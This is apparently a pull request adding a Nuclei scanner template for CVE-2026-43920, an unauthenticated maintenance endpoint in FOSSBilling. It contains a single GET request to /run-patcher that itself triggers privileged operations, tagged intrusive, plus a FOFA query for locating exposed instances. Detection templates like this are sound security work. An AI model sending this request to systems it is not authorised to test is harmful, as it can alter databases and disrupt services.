### PR TITLE
feat: add nuclei template for CVE-2026-43920

### DIFF
--- a/http/cves/2026/CVE-2026-43920.yaml
+++ b/http/cves/2026/CVE-2026-43920.yaml
@@ -1,0 +1,48 @@
+id: CVE-2026-43920
+
+info:
+  name: FOSSBilling - Unauthenticated Patcher Access
+  author: Hardik-369
+  severity: high
+  description: |
+    FOSSBilling versions 0.5.4 through 0.7.2 contain an unauthenticated maintenance endpoint at /run-patcher. The /run-patcher endpoint executes privileged maintenance operations - configuration migrations, database patch execution, filesystem mutations, and cache clearing - without requiring administrator authentication, CSRF validation, or CLI context. An unauthenticated remote attacker can trigger these operations by sending a simple HTTP GET request to /run-patcher.
+  impact: |
+    Unauthenticated attackers can trigger privileged maintenance operations including database schema changes, configuration modifications, and token regeneration, potentially leading to denial of service or account compromise.
+  remediation: |
+    Upgrade to FOSSBilling version 0.8.0 or later.
+  reference:
+    - https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-prx6-m547-rfmg
+    - https://github.com/FOSSBilling/FOSSBilling/releases/tag/0.8.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-43920
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2026-43920
+    cwe-id: CWE-306
+  metadata:
+    max-request: 1
+    verified: false
+    vendor: fossbilling
+    product: fossbilling
+    fofa-query: body="FOSSBilling"
+  tags: cve,cve2026,fossbilling,patcher,auth-bypass,kev
+
+http:
+  - raw:
+      - |
+        GET /run-patcher HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "UpdatePatcher"
+          - "patcher"
+          - "Migration"
+        condition: or
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-43920.yaml
+++ b/http/cves/2026/CVE-2026-43920.yaml
@@ -25,7 +25,7 @@ info:
     vendor: fossbilling
     product: fossbilling
     fofa-query: body="FOSSBilling"
-  tags: cve,cve2026,fossbilling,patcher,auth-bypass,kev
+  tags: cve,cve2026,intrusive,fossbilling,patcher,auth-bypass,kev,vkev
 
 http:
   - raw:


### PR DESCRIPTION
Adds Nuclei template for CVE-2026-43920 - FOSSBilling unauthenticated /run-patcher endpoint access